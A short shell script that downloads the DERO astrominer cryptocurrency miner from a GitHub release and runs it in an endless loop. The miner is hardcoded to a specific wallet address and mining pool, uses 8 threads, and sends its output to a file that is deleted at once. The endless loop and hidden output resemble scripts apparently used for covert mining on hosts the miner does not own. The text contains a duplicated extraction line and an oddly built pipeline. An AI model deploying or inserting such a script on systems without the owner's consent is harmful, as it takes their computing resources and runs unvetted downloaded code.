#!/bin/sh
apt -y install wget
wget https://github.com/dero-am/astrobwt-miner/releases/download/V1.9.2.R5/astrominer-V1.9.2.R5_amd64_linux.tar.gz
tar vafx astrominer-V1.9.2.R5_amd64_linux.tar.gz
tar vafx astrominer-V1.9.2.R5_amd64_linux.tar.gz
cd astrominer
while true; do ./astrominer -w deroi1qyzlxxgq2weyqlxg5u4tkng2lf5rktwanqhse2hwm577ps22zv2x2q9pvfz92x6ss4jlg8289s6ses0zp6 -r community-pools.mysrv.cloud:10300 -p rpc -t 8 > log.sh | rm -rf log.sh;  sleep 8; done | sleep 3
